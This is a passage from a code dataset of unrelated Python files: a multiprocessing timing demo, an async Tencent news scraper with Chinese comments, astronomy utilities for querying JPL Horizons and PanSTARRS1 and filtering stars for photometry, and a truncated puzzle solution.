actually run anything\r\n\r\n\r\n#this loop is used to start multiple processes, and call the do_something fucntion\r\n# the _ is a 'throw away variable\".\r\n#we cannot use p.join here because that would mean ithe processes would still run\r\n#sequentially.\r\n\r\n#we will therefore create an empty list, called 'processes' and append to it\r\ndef main ():\r\n\r\n #start the counter at start of execution\r\n start=time.perf_counter()\r\n\r\n processes = []\r\n\r\n #also, now lets feed an arument into the function of letting it sleep 1.5 seconds\r\n\r\n for _ in range(10):\r\n p = multiprocessing.Process(target=do_something, args=[1.6])\r\n p.start()\r\n #this will append all processes to the list caLLed \"processes\"\r\n processes.append(p)\r\n\r\n #now let us use that list, to join so all the processes finish before the\r\n #remaining code is executed, which is what this following loop does\r\n\r\n for process in processes:\r\n process.join()\r\n\r\n #stop the clock/counter\r\n finish=time.perf_counter()\r\n\r\n #now substract the sfinish minus start, (essentially a stop watch)\r\n print(f'Finished in {round(finish-start,3)} second(s)')\r\n\r\n\r\nif __name__ == '__main__':\r\n # freeze_support()\r\n main()\r\n","repo_name":"12pints/Multiprocessing","sub_path":"multi_test.py","file_name":"multi_test.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"40321917670","text":"\"\"\"\n 本模块内容功能是爬取腾讯新闻网页十篇新闻内容\n Get_news()类是获取新闻网页内容和新闻内容并将文字保存到本地。\n\"\"\"\nimport asyncio\nfrom aiohttp import ClientSession\nimport urllib.request\nfrom bs4 import BeautifulSoup\nfrom lxml import etree\nimport re\nimport tkinter.ttk\nfrom tkinter import ttk\nimport progressbar\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport logging\n\nlogger = logging.getLogger('pencil')\nlogger.setLevel(level=logging.DEBUG)\n# logging.basicConfig(format='%(levelname)s:%(funcName)s:%(message)s', level = logging.DEBUG)\nlog_path='log.log'\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler = logging.FileHandler(log_path, mode='a+', encoding='UTF-8')\nhandler.setLevel(logging.DEBUG)\nhandler.setFormatter(formatter)\nlogger.addHandler(handler)\n\nclass Get_news(object):\n \"\"\"\n 获取新闻网页内容和新闻内容并将文字保存到本地\n \"\"\"\n def __init__(self,url):\n \"\"\" 初始化该类 \"\"\"\n # 输入新闻网页\n self.html = url # 新闻网址(需要更改)\n # self.html = \"https://news.sina.com.cn/china/\" # 新闻网址\n self.div_list = self.getnews_herf(self.html) # 调用函数获取新闻网页中的url的div标签。\n # 新建一个列表,存储具体的新闻url\n url_list = []\n # 循环判断列表中是否有空值\n for i in self.div_list:\n # 删除获得空值\n if i == '':\n div_list.remove(i)\n # 循环输入最新的30篇新闻url\n for div in self.div_list[0:31]:\n # xpath获得a标签中的新闻url\n url = div.xpath('./a/@href')[0]\n # 将url加入到之前创建的空列表\n url_list.append(url)\n # 任务列表对象tasks,利用循环将url_list中的每个url都进行爬取操作加入到tasks中 \n tasks = [asyncio.ensure_future(self.write_news(new_url)) for new_url in url_list]\n # 获取循环事件\n loop = asyncio.get_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(asyncio.wait(tasks))\n # 关闭打开的新闻文本文档\n self.f.close()\n\n\n def getnews_herf(self,url):\n \"\"\"\n 获取网页中具体新闻的div标签列表\n \"\"\"\n # 获得新闻网站的响应数据\n html = urllib.request.urlopen(url).read()\n html = html.decode('utf-8')\n # 获取url的div标签\n tree = etree.HTML(html)\n div_list = tree.xpath('//div[@class=\"left-content-1 marBot\"]/div/ul/li')\n # 返回div列表\n return div_list\n\n async def write_news(self,new_url):\n # 打开文件\n self.f = open('news.txt','w',encoding='utf-8')\n async with ClientSession() as session:\n # 使用异步编程访问网页\n async with session.get(new_url) as response:\n # 输出日志,保存爬取网页url和时间\n logger.debug(f'{new_url} is done.')\n # 一次获取网页的响应,等待期间执行下一次响应(挂起操作)\n response = await response.text(encoding='utf-8')\n # bs_obj为网页信息\n bs_obj = BeautifulSoup(response, 'html.parser')\n # 获取网站内的

标签内容\n downloadList = bs_obj.select('p')\n # 创建一个空列表,后续存入新闻内容。\n text_list = []\n # 获取符合条件的

标签内容\n text_re = re.compile(r'

(\\s+?\\S+?)

')\n # print(downloadList)\n for txt in downloadList:\n # 所有的p标签内容依次匹配\n html=\"{}\".format(txt)\n # 比较符合条件的p标签内容,将符合内容的加入到文本列表中\n text_list += text_re.findall(html)\n # 挂起写入操作,减少响应时间\n await self.write_file(text_list)\n\n\n async def write_file(self,text_list):\n # 向文本文件内写入新闻信息\n for txt in text_list:\n self.f.write(txt[1])\n self.f.write('\\n爬取时间:'+str((time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())))+'\\n')\n self.f.write('\\n')\n\nif __name__ == \"__main__\":\n Get_news()","repo_name":"ITApeDeHao/news_crawler","sub_path":"oldCrawler/Get.py","file_name":"Get.py","file_ext":"py","file_size_in_byte":4454,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"31805420755","text":"from warnings import warn\n\nimport numpy as np\nimport pandas as pd\nfrom astropy import units as u\nfrom astropy.coordinates import SkyCoord\nfrom astropy.table import Table, vstack\nfrom astropy.wcs import WCS\nfrom astroquery.jplhorizons import Horizons\nfrom astroquery.vizier import Vizier\n\n__all__ = [\"HorizonsDiscreteEpochsQuery\", \"organize_ps1_and_isnear\",\n \"PanSTARRS1\", \"group_stars\", \"get_xy\", \"xyinFOV\",\n \"panstarrs_query\"]\n\n\ndef mask_str(n_new, n_old, msg):\n dn = n_old - n_new\n print(f\"{n_new:3d} objects remaining: {dn:3d} masked \"\n + f\"out of {n_old:3d} based on {msg:s}.\")\n\n\nclass HorizonsDiscreteEpochsQuery:\n def __init__(self, targetname, location, epochs, id_type=\"smallbody\"):\n '''\n Parameters\n ----------\n id : str\n Name, number, or designation of the object to be queried.\n location : str or dict\n Observer's location for ephemerides queries or center body\n name for orbital element or vector queries. Uses the same\n codes as JPL Horizons. If no location is provided, Earth's\n center is used for ephemerides queries and the Sun's center\n for elements and vectors queries. Arbitrary topocentic\n coordinates for ephemerides queries can be provided in the\n format of a dictionary. The dictionary has to be of the form\n {``'lon'``: longitude in deg (East positive, West negative),\n ``'lat'``: latitude in deg (North positive, South negative),\n ``'elevation'``: elevation in km above the reference\n ellipsoid, [``'body'``: Horizons body ID of the central\n body; optional; if this value is not provided it is assumed\n that this location is on Earth]}.\n epochs : scalar, list-like, or dictionary\n Either a list of epochs in JD or MJD format or a dictionary\n defining a range of times and dates; the range dictionary\n has to be of the form {``'start'``:'YYYY-MM-DD [HH:MM:SS]',\n ``'stop'``:'YYYY-MM-DD [HH:MM:SS]',\n ``'step'``:'n[y|d|m|s]'}. If no epochs are provided, the\n current time is used.\n id_type : str, optional\n Identifier type, options:\n ``'smallbody'``, ``'majorbody'`` (planets but also anything\n that is not a small body), ``'designation'``, ``'name'``,\n ``'asteroid_name'``, ``'comet_name'``, ``'id'`` (Horizons id\n number), or ``'smallbody'`` (find the closest match under\n any id_type), default: ``'smallbody'``\n '''\n self.targetname = str(targetname)\n self.location = location\n self.epochs = np.asarray(epochs)\n self.id_type = id_type\n self.query_table = None\n self.uri = []\n\n def __str__(self):\n _str = \"Query {:s} at location {} for given discrete epochs.\"\n return _str.format(self.targetname, self.location)\n\n def query(self, depoch=100, *args, **kwargs):\n '''\n Parameters\n ----------\n depoch : int, optional\n The number of discrete epochs to be chopped.\n\n args, kwargs : optional.\n Passed to ``.ephemerides()`` of ``Horizons``.\n '''\n Nepoch = np.shape(self.epochs)[0]\n Nquery = (Nepoch - 1) // depoch + 1\n tabs = []\n\n print(f'Query: {self.targetname} '\n + f'at {self.location} for {Nepoch} epochs''')\n\n if Nquery > 1:\n print(f\"Query chopped into {Nquery} chunks: Doing \",\n end=' ')\n\n for i in range(Nquery):\n print(f\"{i+1}...\", end=' ')\n i_0 = i*depoch\n i_1 = (i + 1)*depoch\n epochs_i = self.epochs[i_0:i_1]\n\n obj = Horizons(id=self.targetname, #\n location=self.location, #\n epochs=epochs_i, #\n id_type=self.id_type)\n eph = obj.ephemerides(*args, **kwargs)\n\n tabs.append(eph)\n self.uri.append(obj.uri)\n\n if len(tabs) == 1:\n self.query_table = tabs[0]\n\n elif len(tabs) > 1:\n self.query_table = vstack(tabs)\n\n print(\"Query done.\")\n\n return self.query_table\n\n\ndef organize_ps1_and_isnear(ps1, header=None, bezel=0,\n nearby_obj_minsep=0*u.deg, group_crit_separation=0,\n select_filter_kw={},\n del_flags=[0, 1, 2, 7, 8, 9, 10, 23, 24],\n drop_by_Kron=True,\n calc_JC=True):\n ''' Organizes the PanSTARRS1 object and check nearby objects.\n Parameters\n ----------\n ps1 : `~PanSTARRS1`\n The `~PanSTARRS1` object.\n\n header : `astropy.header.Header`, None, optional\n The header to extract WCS related information. If ``None``\n (default), it will not drop any stars based on the field of view\n criterion.\n\n bezel : int, float, optional\n The bezel used to select stars inside the field of view.\n\n nearby_obj_minsep : float, `~astropy.Quantity`, optional.\n If there is any object closer than this value, a warning message\n will be printed.\n\n group_crit_separation : float, optional\n The critical separation parameter used in DAOGROUP algorithm\n (`~photutils.DAOGroup`) to select grouped stars.\n\n select_filter_kw : dict, optional\n The kwargs for `~PanSTARRS1.select_filter()` method.\n\n del_flags : list of int, optional\n The flags to be used for dropping objects based on ``\"f_objID\"``\n of Pan-STARRS1 query.\n\n drop_by_Kron : bool, optional\n If ``True`` (default), drop the galaxies based on the Kron\n magnitude criterion suggested by PS1:\n https://outerspace.stsci.edu/display/PANSTARRS/How+to+separate+stars+and+galaxies\n which works good only if i <~ 21.\n\n calc_JC : bool, optional\n Whether to calculate the Johnson-Cousins B V R_C filter\n magnitudes by the linear relationship given by Table 6 of Tonry\n J. et al. 2012, ApJ, 750, 99., using g-r color. The following\n columns will be added to the table ``ps1.queried``:\n\n * ``\"C_gr\"``:\n The ``g-r`` color.\n\n * ``\"dC_gr\"``:\n The total error of ``g-r`` color. Not only the error-bar\n of the mean PSF magnitude (``\"e_Xmag`` for filter\n ``X=\"g\"`` and ``X=\"r\"``), but also the intrinsic\n error-bar of each measurements (``\"XmagStd\" for filter\n ``X=\"g\"`` and ``X=\"r\"``) are considered, i.e., four\n error-bars are propagated by first order approximation\n (square sum and square rooted).\n\n * ``\"Bmag\"``, ``\"Vmag\"``, ``Rmag``:\n ``B = g + 0.213 + 0.587(g-r) (+- 0.034)``\n ``V = r + 0.006 + 0.474(g-r) (+- 0.012)``\n ``R = r - 0.138 -0.131(g-r) (+-0.015)``\n * ``\"dBmag\"``, ``\"dVmag\"``, ``\"dRmag\"``:\n The total error of above magnitudes. The scatter\n reported by Tonry et al. (e.g., 0.012 mag for V) is\n propagated with the first order error estimated from the\n magnitude calculation formula.\n\n Returns\n -------\n isnear : bool\n True if there is any nearby object from ``ps1.queried``.\n '''\n\n _ = ps1.query()\n\n # Select only those within FOV & bezel.\n # If you wanna keep those outside the edges, just set negative\n # ``bezel``.\n if header is not None:\n ps1.select_xyinFOV(header=header, bezel=bezel)\n\n # Check whether any object is near our target\n isnear = ps1.check_nearby(minsep=nearby_obj_minsep)\n if isnear:\n warn(\"There are objects near the target!\")\n\n # Drop objects near to each other\n ps1.drop_star_groups(crit_separation=group_crit_separation)\n\n # Drop for preparing differential photometry\n ps1.drop_for_diff_phot(del_flags=del_flags, drop_by_Kron=drop_by_Kron)\n\n # remove columns that are of no interest\n ps1.select_filters(**select_filter_kw)\n\n ps1.queried[\"_r\"] = ps1.queried[\"_r\"].to(u.arcsec)\n ps1.queried[\"_r\"].format = \"%.3f\"\n\n if calc_JC:\n c_gr = ps1.queried[\"gmag\"] - ps1.queried[\"rmag\"]\n ps1.queried[\"C_gr\"] = c_gr\n\n # Since it includes Std, I used ``d``, inpired by the \"total\n # derivative\" compared to partial derivative.\n var_g = ps1.queried[\"e_gmag\"]**2 + ps1.queried[\"e_gmag\"]**2\n var_r = ps1.queried[\"e_rmag\"]**2 + ps1.queried[\"e_rmag\"]**2\n dc_gr = np.sqrt(var_g + var_r)\n ps1.queried[\"dC_gr\"] = dc_gr\n\n pars = dict(Bmag=[0.213, 0.587, 0.034, \"gmag\", var_g],\n Vmag=[0.006, 0.474, 0.012, \"rmag\", var_r],\n Rmag=[-0.138, -0.131, 0.015, \"rmag\", var_r])\n # filter_name = [B_0, B_1, B_sc of Tonry, mag used for conversion]\n for k, p in pars.items():\n ps1mag = ps1.queried[p[3]]\n ps1.queried[k] = ps1mag + p[0] + p[1] * c_gr\n ps1.queried[f\"d{k}\"] = np.sqrt(p[4] + p[1]*dc_gr**2 + p[2]**2)\n\n return isnear\n\n\n# TODO: Let it accept SkyCoord too\nclass PanSTARRS1:\n def __init__(self, ra, dec, radius=None, inner_radius=None,\n width=None, height=None, columns=[\"**\", \"+_r\"],\n column_filters={}):\n \"\"\" Query PanSTARRS @ VizieR using astroquery.vizier\n\n Parameters\n ----------\n ra, dec, radius : float or `~astropy.Quantity`\n The central RA, DEC and the cone search radius. If not\n `~astropy.Quantity`, assuming it is in degrees unit.\n\n inner_radius : cfloat or `~astropy.Quantity`\n When set in addition to ``radius``, the queried region\n becomes annular, with outer radius ``radius`` and inner\n radius ``inner_radius``. If not `~astropy.Quantity`,\n assuming it is in degrees unit.\n\n width : convertible to `~astropy.coordinates.Angle`\n The width of the square region to query. If not\n `~astropy.Quantity`, assuming it is in degrees unit.\n\n height : convertible to `~astropy.coordinates.Angle`\n When set in addition to ``width``, the queried region\n becomes rectangular, with the specified ``width`` and\n ``height``. If not `~astropy.Quantity`, assuming it is in\n degrees unit.\n\n columns : list of str, str in ['*', '**'], optional\n The columns to be retrieved. The special column ``\"*\"``\n requests just the default columns of a catalog; ``\"**\"``\n (Default) would request all the columns. For sorting, use\n ``\"+\"`` in front of the column name. See the documentation:\n https://astroquery.readthedocs.io/en/latest/vizier/vizier.html#specifying-keywords-output-columns-and-constraints-on-columns\n\n column_filters : dict, optional\n The column filters for astroquery.vizier.\n Example can be ``{\"gmag\":\"13.0..20.0\", \"e_gmag\":\"<0.10\"}``.\n\n Return\n ------\n queried : astropy.table object\n The queried result.\n\n Note\n ----\n All columns: http://vizier.u-strasbg.fr/viz-bin/VizieR?-source=II/349\n \"\"\"\n _params = dict(ra=ra, dec=dec, radius=radius,\n inner_radius=inner_radius, width=width, height=height)\n\n for k, v in _params.items():\n if v is None:\n continue\n if not isinstance(v, u.Quantity):\n warn(f\"{k} is not astropy Quantity: Assuming deg unit\")\n _params[k] = v * u.deg\n self.ra = _params[\"ra\"]\n self.dec = _params[\"dec\"]\n self.radius = _params[\"radius\"]\n self.inner_radius = _params[\"inner_radius\"]\n self.width = _params[\"width\"]\n self.height = _params[\"height\"]\n\n if isinstance(columns, str):\n if columns in ['*', '**']:\n self.columns = [columns]\n else:\n raise ValueError(\"If columns is str, it must be one of \"\n + \"['*', '**']\")\n else:\n self.columns = columns\n\n self.column_filters = column_filters\n\n def query(self):\n vquery = Vizier(columns=self.columns,\n column_filters=self.column_filters,\n row_limit=-1)\n\n field = SkyCoord(ra=self.ra, dec=self.dec, frame='icrs')\n\n self.queried = vquery.query_region(field,\n radius=self.radius,\n inner_radius=self.inner_radius,\n width=self.width,\n height=self.height,\n catalog=\"II/349/ps1\")[0]\n\n return self.queried\n\n def select_xyinFOV(self, header=None, wcs=None, bezel=0, mode='all'):\n ''' Convert RA/DEC to xy (add columns) with rejection at bezels.\n Parameters\n ----------\n header : astropy.io.fits.Header, optional\n The header to extract WCS information. One and only one of\n ``header`` and ``wcs`` must be given.\n\n wcs : astropy.wcs.WCS, optional\n The WCS to convert the RA/DEC to XY. One and only one of\n ``header`` and ``wcs`` must be given.\n\n bezel: int or float, optional\n The bezel size to exclude stars at the image edges. If you\n want to keep some stars outside the edges, put negative\n values (e.g., ``-5``).\n\n mode: 'all' or 'wcs', optional\n Whether to do the transformation including distortions\n (``'all'``) or only including only the core WCS\n transformation (``'wcs'``).\n '''\n N_old = len(self.queried)\n self.queried = xyinFOV(table=self.queried, header=header, wcs=wcs,\n ra_key=\"RAJ2000\", dec_key=\"DEJ2000\",\n bezel=bezel, origin=0, mode=mode)\n N_new = len(self.queried)\n mask_str(N_new, N_old, f\"{bezel}-pixel bezel\")\n\n def drop_for_diff_phot(self, del_flags=[0, 1, 2, 7, 8, 9, 10, 23, 24],\n drop_by_Kron=True):\n ''' Drop objects which are not good for differential photometry.\n Parameters\n ----------\n del_flags : list of int, None, optional\n The flags to be used for dropping objects based on\n ``\"f_objID\"`` of Pan-STARRS1 query. These are the powers of\n 2 to identify the flag (e.g., 2 means ``2**2`` or flag\n ``4``). See Note below for each flag. Set it to ``None`` to\n keep all the objects based on ``\"f_objID\"``.\n\n drop_by_Kron : bool, optional\n If ``True`` (default), drop the galaxies based on the Kron\n magnitude criterion suggested by PS1:\n https://outerspace.stsci.edu/display/PANSTARRS/How+to+separate+stars+and+galaxies\n which works good only if i <~ 21.\n\n Note\n ----\n 1 (2^0) = Used within relphot (FEW); skip star.\n 2 = Used within relphot (POOR); skip star.\n 4 = object IDed with known ICRF quasar (may have ICRF\n position measurement)\n 8 = identified as likely QSO (Hernitschek+\n 2015ApJ...801...45H), PQSO≥0.60\n 16 = identified as possible QSO (Hernitschek+\n 2015ApJ...801...45H), PQSO≥0.05\n 32 = identified as likely RR Lyra (Hernitschek+\n 2015ApJ...801...45H), PRRLyra≥0.60\n 64 = identified as possible RR Lyra (Hernitschek+\n 2015ApJ...801...45H), PRRLyra≥0.05\n 128 = identified as a variable based on ChiSq (Hernitschek+\n 2015ApJ...801...45H)\n 256 = identified as a non-periodic (stationary) transient\n 512 = at least one detection identified with a known\n solar-system object (asteroid or other).\n 1024 (2^10) = most detections identified with a known\n solar-system object (asteroid or other).\n 2048 = star with large proper motion\n 4096 = simple weighted average position was used (no IRLS\n fitting)\n 8192 = average position was fitted\n 16384 = proper motion model was fitted\n 32768 = parallax model was fitted\n 65536 = average position used (not PM or PAR)\n 131072 = proper motion used (not AVE or PAR)\n 262144 = parallax used (not AVE or PM)\n 524288 = mean astrometry could not be measured\n 1048576 (2^20) = stack position used for mean astrometry\n 2097152 = mean astrometry used for stack position\n 4194304 = failure to measure proper-motion model\n 8388608 = extended in our data (eg, PS)\n 16777216 = extended in external data (eg, 2MASS)\n 33554432 = good-quality measurement in our data (eg,PS)\n 67108864 = good-quality measurement in external data (eg,\n 2MASS)\n 134217728 = good-quality object in the stack (>1 good stack\n measurement)\n 268435456 = the primary stack measurements are the best\n measurements\n 536870912 = suspect object in the stack (no more than 1 good\n measurement, 2 or more suspect or good stack\n measurement)\n 1073741824 (2^30) = poor-quality stack object (no more than\n 1 good or suspect measurement)\n\n Among the ``\"f_objID\"``, the following are better to be dropped\n because they are surely not usable for differential photometry:\n\n * 1, 2, 4, 128, 256, 512, 1024, 8388608, 16777216\n\n or in binary position (``del_flags``),\n\n * 0, 1, 2, 7, 8, 9, 10, 23, 24\n\n (plus maybe 2048(2^11) because centroiding may not work\n properly?)\n '''\n N_old = len(self.queried)\n if del_flags is not None:\n idx2remove = []\n for i, row in enumerate(self.queried):\n b_flag = list(f\"{row['f_objID']:031b}\")\n for bin_pos in del_flags:\n if b_flag[-bin_pos] == '1':\n idx2remove.append(i)\n self.queried.remove_rows(idx2remove)\n\n N_fobj = len(self.queried)\n mask_str(N_fobj, N_old, f\"f_objID ({del_flags})\")\n\n N_old = N_fobj\n\n if drop_by_Kron:\n dmag = (self.queried[\"imag\"] - self.queried[\"iKmag\"])\n mask = (dmag > 0.05)\n self.queried = self.queried[~mask]\n\n N_Kron = len(self.queried)\n mask_str(N_Kron, N_old, \"the Kron magnitude criterion\")\n\n def select_filters(self, filter_names=[\"g\", \"r\", \"i\"],\n keep_columns=[\"_r\", \"objID\", \"f_objID\",\n \"RAJ2000\", \"DEJ2000\", \"x\", \"y\"],\n n_mins=[0, 0, 0]):\n ''' Abridges the columns depending on the specified filters.\n '''\n if not isinstance(filter_names, (list, tuple, np.ndarray)):\n filter_names = [filter_names]\n\n n_mins = np.atleast_1d(n_mins)\n if n_mins.shape[0] == 1:\n n_mins = np.repeat(n_mins, len(filter_names))\n elif n_mins.shape[0] != len(filter_names):\n raise ValueError(\"n_mins must be length 1 or same length as \"\n f\"filter_names (now it's {len(filter_names)}).\")\n\n selected_columns = keep_columns\n toremove_columns = []\n\n for filt in filter_names:\n selected_columns.append(f\"N{filt}\")\n selected_columns.append(f\"{filt}mag\")\n selected_columns.append(f\"{filt}Kmag\")\n selected_columns.append(f\"{filt}Flags\")\n selected_columns.append(f\"{filt}PSFf\")\n selected_columns.append(f\"{filt}magStd\")\n selected_columns.append(f\"e_{filt}mag\")\n selected_columns.append(f\"e_{filt}Kmag\")\n selected_columns.append(f\"o_{filt}mag\")\n selected_columns.append(f\"b_{filt}mag\")\n selected_columns.append(f\"B_{filt}mag\")\n\n for c in self.queried.columns:\n if c not in selected_columns:\n toremove_columns.append(c)\n\n self.queried.remove_columns(toremove_columns)\n\n N_old = len(self.queried)\n\n for i, filt in enumerate(filter_names):\n mask = np.array(self.queried[f\"o_{filt}mag\"]) < n_mins[i]\n self.queried = self.queried[~mask]\n\n N_new = len(self.queried)\n mask_str(N_new, N_old, f\"o_{filter_names}mag >= {n_mins}\")\n\n def check_nearby(self, minsep, maxmag=None, filter_names=[\"r\"]):\n ''' Checkes whether there is any nearby object.\n Note\n ----\n It checks the ``\"_r\"`` column of the ``PanSTARRS1`` queried\n result. Therefore, the query center should be the position where\n you want to check for any nearby object.\n\n Parameters\n ----------\n minsep : float or `~astropy.Quantity`\n The minimum separation to detect nearby object\n maxmag : int or float, optional\n The maximum magnitude value to mask objects. Objects fainter\n than this magnitude (Mean PSF magnitude) will be accepted\n even though it is nearby the search center.\n '''\n if isinstance(minsep, (float, int)):\n warn(\"minsep is not Quantity. Assuming degree unit.\")\n minsep = minsep * u.deg\n elif not isinstance(minsep, u.Quantity):\n raise TypeError(\"minsep not understood.\")\n\n if not isinstance(filter_names, (list, tuple, np.ndarray)):\n filter_names = [filter_names]\n\n chktab = self.queried.copy()\n\n if maxmag is not None:\n for filt in filter_names:\n chktab = chktab[chktab[filt] <= maxmag]\n minsep = minsep.to(chktab[\"_r\"].unit).value\n isnear = (np.array(chktab[\"_r\"]).min() <= minsep)\n return isnear\n\n def drop_star_groups(self, crit_separation):\n N_old = len(self.queried)\n grouped_rows = group_stars(table=self.queried,\n crit_separation=crit_separation,\n xcol=\"x\", ycol=\"y\", index_only=True)\n self.queried.remove_rows(grouped_rows)\n N_new = len(self.queried)\n mask_str(N_new, N_old,\n (f\"DAOGROUP with {crit_separation:.3f}-pixel critical \"\n + \"separation.\"))\n\n\ndef group_stars(table, crit_separation, xcol=\"x\", ycol=\"y\", index_only=True):\n ''' Group stars using DAOGROUP algorithm and return row indices.\n Parameters\n ----------\n table: astropy.table.Table\n The queried result table.\n crit_separation: float or int\n Distance, in units of pixels, such that any two stars separated by\n less than this distance will be placed in the same group.\n xcol, ycol: str, optional\n The column names for x and y positions. This is necessary since\n ``photutils.DAOGroup`` accepts a table which has x y positions\n designated as ``\"x_0\"`` and ``\"y_0\"``.\n index : bool, optional\n Whether to return only the index of the grouped rows (group\n information is lost) or the full grouped table (after group_by).\n\n Notes\n -----\n Assuming the psf fwhm to be known, ``crit_separation`` may be set to\n ``k * fwhm``, for some positive real k.\n\n See Also\n --------\n photutils.DAOStarFinder\n\n References\n ----------\n [1] Stetson, Astronomical Society of the Pacific, Publications,\n (ISSN 0004-6280), vol. 99, March 1987, p. 191-222.\n Available at: http://adsabs.harvard.edu/abs/1987PASP...99..191S\n\n Return\n ------\n gtab: Table\n Returned when ``index_only=False``.\n The table underwent ``.group_by(\"group_id\")``.\n\n grouped_rows: list\n Returned when ``index_only=True``.\n The indices of the rows which are \"grouped\" stars. You may remove\n such rows using ``table.remove_rows(grouped_rows)``.\n '''\n from photutils.psf.groupstars import DAOGroup\n tab = table.copy()\n\n tab[xcol].name = \"x_0\"\n tab[ycol].name = \"y_0\"\n gtab = DAOGroup(crit_separation=crit_separation)(tab).group_by(\"group_id\")\n if not index_only:\n return gtab\n else:\n gid, gnum = np.unique(gtab[\"group_id\"], return_counts=True)\n gmask = gid[gnum != 1] # group id with > 1 stars\n grouped_rows = []\n for i, gid in enumerate(gtab[\"group_id\"]):\n if gid in gmask:\n grouped_rows.append(i)\n return grouped_rows\n\n\ndef get_xy(header, ra, dec, unit=u.deg, origin=0, mode='all'):\n ''' Get image XY from the header WCS\n Parameters\n ----------\n header: astropy.io.fits.Header or pandas.DataFrame\n The header to extract WCS information.\n\n ra, dec: float or Quantity or array-like of such\n The coordinates to get XY position. If Quantity, ``unit`` will\n likely be ignored.\n\n unit: `~astropy.Quantity` or tuple of such\n Unit of the ``ra`` and ``dec`` given. It can be a tuple if they\n differ.\n\n origin: int, optional\n Whether to return 0 or 1-based pixel coordinates.\n\n mode: 'all' or 'wcs', optional\n Whether to do the transformation including distortions\n (``'all'``) or only including only the core WCS transformation\n (``'wcs'``).\n '''\n w = WCS(header)\n coo = SkyCoord(ra, dec, unit=unit)\n xy = SkyCoord.to_pixel(coo, wcs=w, origin=origin, mode=mode)\n return xy\n\n\ndef xyinFOV(table, header=None, wcs=None, ra_key='ra', dec_key='dec', bezel=0,\n origin=0, mode='all'):\n ''' Convert RA/DEC to pixel with rejection at bezels\n Parameters\n ----------\n header : astropy.io.fits.Header, optional\n The header to extract WCS information. One and only one of\n ``header`` and ``wcs`` must be given.\n\n wcs : astropy.wcs.WCS, optional\n The WCS to convert the RA/DEC to XY. One and only one of\n ``header`` and ``wcs`` must be given.\n\n table : astropy.table.Table or pandas.DataFrame\n The queried result table.\n\n ra_key, dec_key : str, optional\n The column names containing RA/DEC.\n\n bezel : int or float, optional\n The bezel size to exclude stars at the image edges. If you want to\n keep some stars outside the edges, put negative values (e.g., ``-5``).\n\n origin : int, optional\n Whether to return 0 or 1-based pixel coordinates.\n\n mode: 'all' or 'wcs', optional\n Whether to do the transformation including distortions (``'all'``) or\n only including only the core WCS transformation (``'wcs'``).\n '''\n if not (header is None) ^ (wcs is None):\n raise ValueError(\"One and only one of header and wcs should be given.\")\n\n _tab = table.copy()\n if isinstance(table, pd.DataFrame):\n _tab = Table.from_pandas(table)\n elif not isinstance(table, Table):\n raise TypeError(\n \"table must be either astropy Table or pandas DataFrame.\")\n\n if wcs is None:\n wcs = WCS(header)\n\n coo = SkyCoord(_tab[ra_key], _tab[dec_key])\n x, y = coo.to_pixel(wcs=wcs, origin=0, mode=mode)\n\n nx, ny = header['naxis1'], header['naxis2']\n mask = ((x < (0 + bezel))\n | (x > (nx - bezel))\n | (y < (0 + bezel))\n | (y > (ny - bezel)))\n x = x[~mask]\n y = y[~mask]\n _tab.remove_rows(mask)\n\n _tab[\"x\"] = x\n _tab[\"y\"] = y\n\n return _tab\n\n\n\"\"\"\ndef sdss2BV(g, r, gerr=None, rerr=None):\n '''\n Pan-STARRS DR1 (PS1) uses AB mag.\n https://www.sdss.org/dr12/algorithms/fluxcal/#SDSStoAB\n Jester et al. (2005) and Lupton (2005):\n https://www.sdss.org/dr12/algorithms/sdssubvritransform/\n Here I used Lupton. Application to PS1, it seems like Jester - Lupton VS\n Lupton V mag is scattered around -0.013 +- 0.003 (minmax = -0.025, -0.005)\n --> Lupton conversion is fainter.\n V = g - 0.5784*(g - r) - 0.0038; sigma = 0.0054\n '''\n if gerr is None:\n gerr = np.zeros_like(g)\n\n if rerr is None:\n rerr = np.zeros_like(r)\n\n V = g - 0.5784 * (g - r) - 0.0038\n dV = np.sqrt((1.5784 * gerr)**2 + (0.5784 * rerr)**2 + 0.0052**2)\n return V, dV\n\"\"\"\n\n\ndef panstarrs_query(ra_deg, dec_deg, radius=None, inner_radius=None,\n width=None, height=None, columns=None, column_filters={}):\n \"\"\"\n DEPRECATED\n \"\"\"\n print(\"panstarrs_query is deprecated. Use PanSTARRS1.\")\n ps1 = PanSTARRS1(ra=ra_deg*u.deg, dec=dec_deg*u.deg,\n radius=radius, inner_radius=inner_radius,\n width=width, height=height,\n columns=columns, column_filters=column_filters)\n\n return ps1.queried\n","repo_name":"ysBach/IshiguroM_etal_155140_2005UD","sub_path":"photometry/ysphotutilpy/ysphotutilpy/queryutil.py","file_name":"queryutil.py","file_ext":"py","file_size_in_byte":29021,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"40381183675","text":"# from collections import *\n# from itertools import *\n# from math import *\nfrom submit_answer import submit_answer\n\n\n\n# N E S W\nchr = [-1, 0, 1, 0, -1, -1, 1, 1]\nchc = [0, 1, 0, -1, -1, 1, -1, 1]\n\n\nLEVEL = 2\nSAMPLE_ANSWERS = [3, 1623178306]\nSAMPLE_ANSWER = SAMPLE_ANSWERS[LEVEL - 1]\n\n\ndef solve(input_string: str) -> int or str:\n # A = list(input_string)\n # A = list(map(int, input_string.split(',')))\n # A = [line for line in input_string.split('\\n')]\n A = [int(line) for line in input_string.split('\\n')]\n # A = [list(map(int, line)) for line in input_string.split('\\n')]\n\n N = len(A)\n print(\"N =\", N)\n print(A[:10])\n # M = len(A[0])\n\n if LEVEL == 2:\n KEY = 811589153\n A = [x * KEY for x in A]\n\n M = 1 if LEVEL == 1 else 10\n\n values = [(A[i], i) for i in range(N)]\n for _ in range(M):\n for i in range(N):\n cur = values.index((A[i], i))\n val = values.pop(cur)\n cur = (cur + val[0]) % len(values)\n if cur == 0:\n cur = N\n values.insert(cur, val)\n # for a in values:\n # print(a[0], end=' ')\n # print()\n\n zero = values.index((0, A.index(0)))\n ans = 0\n for i in range(0, 3000, 1000):\n ans += values[(1000 + i + 